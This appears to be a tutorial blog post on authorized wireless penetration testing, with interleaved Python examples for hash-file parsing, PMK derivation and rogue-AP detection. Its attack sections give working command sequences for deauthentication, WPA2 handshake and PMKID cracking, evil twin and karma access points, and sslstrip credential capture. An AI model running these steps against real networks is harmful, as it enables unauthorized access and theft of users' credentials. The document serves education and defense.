Ethical Wi-Fi Pentesting: From Recon to Exploitation
A hands-on guide to wireless network penetration testing — monitoring, cracking WPA2/WPA3, evil twin attacks, and client-side exploitation, all within legal and ethical boundaries.
Rules of Engagement
Before touching a single packet, you need explicit written authorization. Wi-Fi pentesting without permission is illegal in virtually every jurisdiction. This isn’t a suggestion — it’s the law.
Legal requirements:
✓ Written scope document signed by the network owner
✓ Defined target SSIDs and BSSIDs
✓ Time window for testing
✓ Authorized attack types (passive only, active, DoS)
✓ Emergency contact if something breaks
✗ "My neighbor's Wi-Fi" is never in scope
✗ Public Wi-Fi at a coffee shop is never in scope
✗ "I'm learning" is not a legal defense
With that clear — let’s break some (authorized) wireless networks.
Hardware Setup
Wireless Adapter Selection
Not all Wi-Fi adapters support monitor mode and packet injection. You need specific chipsets:
Recommended chipsets (2025):
✓ MediaTek MT7612U — Dual-band, excellent Linux support
✓ Realtek RTL8812AU — 802.11ac, widely available
✓ Atheros AR9271 — Classic, bulletproof compatibility
✓ Intel AX210 — Built-in on many laptops (limited injection)
Recommended adapters:
- ALFA AWUS036ACH (Realtek, dual-band, high power)
- ALFA AWUS036ACHM (MediaTek, newer, great range)
- Panda PAU09 (budget-friendly, dual-band)
Software Stack
```bash
# Kali Linux has everything pre-installed
# On other distros:

# Aircrack-ng suite
sudo apt install aircrack-ng

# Bettercap (Swiss army knife for network attacks)
sudo apt install bettercap

# Hashcat (GPU-accelerated cracking)
sudo apt install hashcat

# hcxdumptool + hcxtools (modern capture tools)
sudo apt install hcxdumptool hcxtools

# Wireshark for packet analysis
sudo apt install wireshark
```
Phase 1: Reconnaissance
Enable Monitor Mode
```bash
# Check your wireless interface
iwconfig

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Interface becomes wlan0mon

# Verify
iwconfig wlan0mon
# Mode should show "Monitor"
```
Passive Scanning
```bash
# Scan all channels for access points and clients
sudo airodump-ng wlan0mon

# Output columns:
#   BSSID   — MAC address of the access point
#   PWR     — Signal strength (closer to 0 = stronger)
#   Beacons — Number of beacon frames
#   #Data   — Number of data frames captured
#   CH      — Channel
#   ENC     — Encryption type (WPA2, WPA3, OPN)
#   ESSID   — Network name

# Focus on target network (authorized target)
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture
```
Client Enumeration
The bottom section of airodump-ng shows connected clients:
```text
BSSID              STATION            PWR   Rate   Lost  Packets
AA:BB:CC:DD:EE:FF  11:22:33:44:55:66  -42   54e    0     1247
AA:BB:CC:DD:EE:FF  77:88:99:AA:BB:CC  -68   24e    3     89
```
Document all clients — you’ll need them for deauth attacks and client-side testing.
Phase 2: WPA2-PSK Cracking
The Four-Way Handshake
WPA2-PSK authentication uses a four-way handshake that contains enough information to verify a password guess offline:
```text
Client                                        Access Point
  │                                                │
  │ ←── ANonce ─────────────────────────────────── │  Message 1
  │                                                │
  │ ──── SNonce + MIC ───────────────────────────→ │  Message 2
  │                                                │
  │ ←── GTK + MIC ──────────────────────────────── │  Message 3
  │                                                │
  │ ──── ACK ───────────────────────────────────→  │  Message 4
  │                                                │

PTK = PRF(PMK, ANonce, SNonce, MAC_AP, MAC_Client)
PMK = PBKDF2(passphrase, SSID, 4096, 256)    # PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output
```

Everything in the PTK derivation except the PMK is sent in the clear, and the MIC in Message 2 is keyed by the PTK. An attacker who has captured Messages 1 and 2 can therefore derive a candidate PMK from each password guess, recompute the MIC, and compare it to the captured one entirely offline.
Capturing the Handshake
```bash
# Method 1: Wait for a client to connect naturally
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake

# Method 2: Force a reconnection via deauthentication
# (Only on authorized networks!)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
#   -0 5 = send 5 deauth frames
#   -a   = target AP BSSID
#   -c   = target client MAC

# Watch airodump-ng for "WPA handshake: AA:BB:CC:DD:EE:FF" in the top right
```
Modern Alternative: PMKID Attack
The PMKID attack doesn’t require a client — it works against the AP directly:
```bash
# Capture PMKID using hcxdumptool
# (option names as used by hcxdumptool 6.2; 6.3 and later changed the
#  filtering options to BPF-based ones, so check hcxdumptool --help)
sudo hcxdumptool -i wlan0mon -o capture.pcapng \
  --filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2 \
  --enable_status=3

# Convert to hashcat format
hcxpcapngtool -o hash.22000 capture.pcapng

# Check if a PMKID was captured
cat hash.22000
# WPA*01*... = PMKID
# WPA*02*... = EAPOL (four-way handshake)
```
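Before spending GPU time it helps to know exactly what `hash.22000` holds. The parser below is an added example (not from the article or hcxtools) that validates each record against hashcat's 22000 layout and counts PMKIDs versus handshakes per network; the sample file it reads is constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Added example (not from the article or hcxtools): triage a hash.22000 file
# before cracking. Hashcat's 22000 format is nine '*'-separated fields:
# WPA*TYPE*PMKID_or_MIC*MAC_AP*MAC_CLIENT*ESSID_hex*ANONCE*EAPOL*MESSAGEPAIR,
# with TYPE 01 = PMKID (last three fields empty) and 02 = EAPOL handshake.

HEX = re.compile(r"^[0-9a-fA-F]*$")
KINDS = {"01": "PMKID", "02": "EAPOL handshake"}

@dataclass(frozen=True)
class Hash22000:
    kind: str
    ap_mac: str
    client_mac: str
    essid: str

def fmt_mac(h: str) -> str:
    return ":".join(h[i:i + 2] for i in range(0, 12, 2)).upper()

def parse_22000_line(line: str) -> Hash22000:
    """Validate one record strictly; a malformed line raises ValueError."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in KINDS:
        raise ValueError(f"not a hashcat 22000 record: {line!r}")
    _, kind, auth, ap, sta, essid_hex, anonce, eapol, pair = f
    if not all(HEX.match(x) for x in f[2:]) or len(auth) != 32 or (len(ap), len(sta)) != (12, 12):
        raise ValueError(f"malformed hex field in: {line!r}")
    if kind == "01" and (anonce or eapol or pair):
        raise ValueError("PMKID record must not carry ANONCE/EAPOL/MESSAGEPAIR")
    if kind == "02" and (len(anonce) != 64 or not eapol or len(pair) != 2):
        raise ValueError("handshake record needs 64-hex ANONCE, EAPOL and MESSAGEPAIR")
    essid = bytes.fromhex(essid_hex).decode("utf-8", errors="replace")
    return Hash22000(KINDS[kind], fmt_mac(ap), fmt_mac(sta), essid)

def summarize(lines) -> Counter:
    """Count records per (ESSID, AP MAC, kind), skipping blank lines."""
    return Counter((r.essid, r.ap_mac, r.kind)
                   for r in map(parse_22000_line, filter(str.strip, lines)))

# Constructed sample file: one PMKID and one handshake for the article's target AP.
SAMPLE_HASH_FILE = (
    "WPA*01*00112233445566778899aabbccddeeff*aabbccddeeff*112233445566*436f72704e6574776f726b***\n"
    "WPA*02*ffeeddccbbaa99887766554433221100*aabbccddeeff*778899aabbcc*436f72704e6574776f726b*"
    + "a1" * 32 + "*0103005f02030a0000000000000000000001*02\n"
)
```

`summarize(open("hash.22000"))` gives the per-network tally; a `ValueError` points at a truncated or hand-edited line that hashcat would otherwise silently skip.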
Cracking with Hashcat
```bash
# Dictionary attack
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt

# Rule-based attack (mutations on dictionary words)
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

# Brute-force 8-digit numeric password
hashcat -m 22000 hash.22000 -a 3 ?d?d?d?d?d?d?d?d

# Mask attack for common patterns (Word + digits)
hashcat -m 22000 hash.22000 -a 3 ?u?l?l?l?l?d?d?d?d

# Check results
hashcat -m 22000 hash.22000 --show
```
Benchmark: a single RTX 4090 achieves ~2.5 million WPA2 PMKs/second. An 8-character all-lowercase password that appears in a wordlist falls in minutes; exhausting the full 26^8 (about 2 × 10^11) keyspace at that rate takes roughly a day, which is why the attacks above start with dictionaries and masks rather than raw brute force.
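Two things above are worth computing rather than taking on faith: the PMK derivation from the handshake section and what the benchmark figure means for different passphrase policies. This is an added example, not code from the article; it uses Python's standard library and the IEEE 802.11i test vector (passphrase "password", SSID "IEEE") as input.

```python
import hashlib

# Added example (not from the article): derive the WPA2 PMK exactly as the
# formula PMK = PBKDF2(passphrase, SSID, 4096, 256) states, then turn the
# ~2.5 million PMK/s benchmark into worst-case exhaustive-search times.

PMK_RATE = 2.5e6  # PMKs per second, the RTX 4090 figure quoted above

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK PMK: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)

def seconds_to_exhaust(charset_size: int, length: int, rate: float = PMK_RATE) -> float:
    """Time to try every passphrase of `length` characters over an alphabet of `charset_size`."""
    return charset_size ** length / rate

def human_duration(seconds: float) -> str:
    """Express a duration in the largest unit that is at least 1."""
    for name, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {name}"
    return f"{seconds:.1f} seconds"

# Worst-case budgets for the mask attacks shown above and for the 20+ character
# passphrases recommended later in the report. Dictionary hits are found far sooner.
POLICIES = (("8 digits (?d x8)", 10, 8), ("8 lowercase", 26, 8),
            ("8 mixed case + digits", 62, 8), ("20 lowercase", 26, 20))

if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print("PMK:", derive_pmk("password", "IEEE").hex())
    for label, charset, length in POLICIES:
        print(f"{label:>22}: {human_duration(seconds_to_exhaust(charset, length))}")
```

The 4096 PBKDF2 rounds are the only work factor between a guess and a verdict, and they were sized for 2004 hardware; the 20-character row is the practical argument for the passphrase length the report recommends.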
Phase 3: Evil Twin Attack
An evil twin creates a fake AP that mimics the target, capturing credentials:
```text
# Using bettercap for automated evil twin
sudo bettercap -iface wlan0mon

# Within bettercap:
> wifi.recon on
> wifi.show

# Set up evil twin with captive portal
> set wifi.ap.ssid "CorpNetwork"
> set wifi.ap.bssid AA:BB:CC:DD:EE:FF
> set wifi.ap.channel 6
> set wifi.ap.encryption false
> wifi.ap on

# Deauth clients from real AP to force reconnection to evil twin
> wifi.deauth AA:BB:CC:DD:EE:FF
```
For a more sophisticated approach with a captive portal:
```bash
# Using hostapd-mana + dnsmasq + custom portal

# 1. Create hostapd config
cat > evil_twin.conf << 'EOF'
interface=wlan0mon
driver=nl80211
ssid=CorpNetwork
channel=6
hw_mode=g
EOF

# 2. Start the fake AP
sudo hostapd evil_twin.conf &

# 3. Configure DHCP
sudo dnsmasq --interface=wlan0mon \
  --dhcp-range=10.0.0.10,10.0.0.50,12h \
  --address=/#/10.0.0.1

# 4. Redirect HTTP to captive portal
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
  -j REDIRECT --to-port 8080
```
Phase 4: WPA3 and SAE
WPA3 uses Simultaneous Authentication of Equals (SAE), also known as the Dragonfly handshake, in place of the PSK-derived PMK:
WPA3-SAE improvements over WPA2:
✓ Forward secrecy (past sessions can't be decrypted)
✓ Resistant to offline dictionary attacks
✓ Protected against KRACK-style reinstallation attacks
✗ Transition mode (WPA3/WPA2 mixed) is still vulnerable
✗ Side-channel attacks (Dragonblood) partially mitigated
Testing WPA3 Transition Mode
Many networks run WPA3 in transition mode for backward compatibility. This is the weak point:
```bash
# Force WPA2 connection to a transition-mode AP
# The AP will accept WPA2 clients, enabling traditional attacks

# Check if AP supports transition mode
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6
# Look for "WPA2 WPA3" in ENC column

# If transition mode is enabled:
# Standard WPA2 handshake capture and cracking still works
```
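The flip side of Phases 3 and 4 is spotting them from the network's own side. The following is an added example (not from the article, aircrack-ng, bettercap or any wIDS product) that audits a survey of observed access points, given as constructed rows in the shape of airodump-ng's BSSID/CH/ENC/ESSID columns, against a constructed authorized inventory: a foreign BSSID advertising the corporate SSID is an evil twin, one BSSID seen with two different channel/encryption combinations is a twin that copied the real MAC (as the bettercap setup above does), and an owned AP showing "WPA2 WPA3" is transition mode.

```python
from dataclasses import dataclass

# Added example (not from the article or aircrack-ng): audit a survey of
# observed APs, shaped like airodump-ng's BSSID/CH/ENC/ESSID columns, against
# the authorized inventory. Inventory and survey rows are constructed.

@dataclass(frozen=True)
class ObservedAP:
    bssid: str
    channel: int
    enc: str  # airodump-ng ENC column: "WPA2", "WPA3", "WPA2 WPA3", "OPN"
    essid: str

# BSSIDs we own and the SSIDs each may advertise (constructed).
AUTHORIZED = {"AA:BB:CC:DD:EE:FF": {"CorpNetwork"},
              "AA:BB:CC:DD:EE:00": {"CorpNetwork", "CorpGuest"}}
CORPORATE_SSIDS = set().union(*AUTHORIZED.values())

# Constructed survey: real AP in transition mode, a twin cloning its BSSID as an
# open network, a twin on a foreign BSSID, a healthy WPA3 guest AP, a neighbour.
SURVEY = [
    ObservedAP("AA:BB:CC:DD:EE:FF", 6, "WPA2 WPA3", "CorpNetwork"),
    ObservedAP("AA:BB:CC:DD:EE:FF", 6, "OPN", "CorpNetwork"),
    ObservedAP("DE:AD:BE:EF:00:01", 1, "OPN", "CorpNetwork"),
    ObservedAP("AA:BB:CC:DD:EE:00", 11, "WPA3", "CorpGuest"),
    ObservedAP("12:34:56:78:9A:BC", 3, "WPA2", "NeighborNet"),
]

def audit(observed):
    """Return (severity, bssid, message) findings for a survey."""
    findings, variants = [], {}
    for ap in observed:
        variants.setdefault(ap.bssid.upper(), set()).add((ap.channel, ap.enc))
    # One BSSID seen with two channel/encryption combinations means a second
    # radio is impersonating it: this catches a twin that copies the real MAC.
    for bssid, seen in variants.items():
        if len(seen) > 1:
            findings.append(("CRITICAL", bssid, f"cloned BSSID, seen as {sorted(seen)}"))
    for ap in observed:
        bssid, modes = ap.bssid.upper(), set(ap.enc.split())
        if ap.essid in CORPORATE_SSIDS and bssid not in AUTHORIZED:
            sev = "CRITICAL" if ap.enc == "OPN" else "HIGH"
            findings.append((sev, bssid, f"evil twin: foreign AP serving '{ap.essid}' as {ap.enc}"))
        elif bssid in AUTHORIZED and {"WPA2", "WPA3"} <= modes:
            findings.append(("MEDIUM", bssid, "WPA3 transition mode: WPA2 clients still accepted"))
        elif bssid in AUTHORIZED and "WPA3" not in modes:
            findings.append(("HIGH", bssid, f"'{ap.essid}' served as {ap.enc}; policy is WPA3-SAE only"))
    return findings
```

Feeding `audit()` a periodic scan export is the "monitor for rogue APs continuously" item from the defense list in its simplest form; a real wIDS adds signal strength and frame fingerprinting to tell the two radios behind a cloned BSSID apart.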
Phase 5: Client-Side Attacks
Karma Attack (Responding to Probe Requests)
Devices constantly broadcast probe requests for known networks. A karma attack responds to all of them:
```text
# Using bettercap
sudo bettercap -iface wlan0mon
> set wifi.ap.ssid ""
> set wifi.ap.channel 1
> wifi.ap on

# bettercap will respond to client probe requests
# claiming to be whatever network they're looking for
```
Capturing Credentials from Connected Clients
Once clients connect to your rogue AP:
```text
# Start HTTP/HTTPS proxy to capture credentials
> set http.proxy.sslstrip true
> http.proxy on
> net.sniff on

# Monitor captured credentials
> events.show
```
Reporting
A pentest is only as valuable as its report. Structure your wireless findings:
```markdown
## Wireless Penetration Test Report

### Executive Summary
[Non-technical overview of risk level]

### Findings

#### CRITICAL: WPA2-PSK Cracked in 3 Minutes
- **SSID:** CorpNetwork
- **Attack:** PMKID capture + dictionary attack
- **Password:** [redacted] (8-character dictionary word)
- **Impact:** Full network access, lateral movement possible
- **Recommendation:** Migrate to WPA3-SAE only mode,
  enforce 20+ character passphrases, implement 802.1X

#### HIGH: Evil Twin Attack Successful
- **Attack:** Rogue AP with captive portal
- **Result:** 4 employees submitted domain credentials
- **Impact:** Active Directory compromise
- **Recommendation:** User awareness training,
  802.1X with certificate pinning

#### MEDIUM: WPA3 Transition Mode Enabled
- **Risk:** Downgrades WPA3 security to WPA2 level
- **Recommendation:** Disable transition mode,
  ensure all clients support WPA3
```
Defense Recommendations
For network administrators:
✓ Deploy WPA3-SAE only (no transition mode)
✓ Use 802.1X/EAP with RADIUS for enterprise networks
✓ Implement Wireless Intrusion Detection (wIDS)
✓ Monitor for rogue APs continuously
✓ Use client isolation on guest networks
✓ Disable WPS (Wi-Fi Protected Setup)
✓ Segment wireless from critical internal networks
✓ Rotate PSK regularly if enterprise auth isn't feasible
✓ Train users to verify network authenticity
The airwaves are invisible but far from empty. Test your wireless security before someone else does.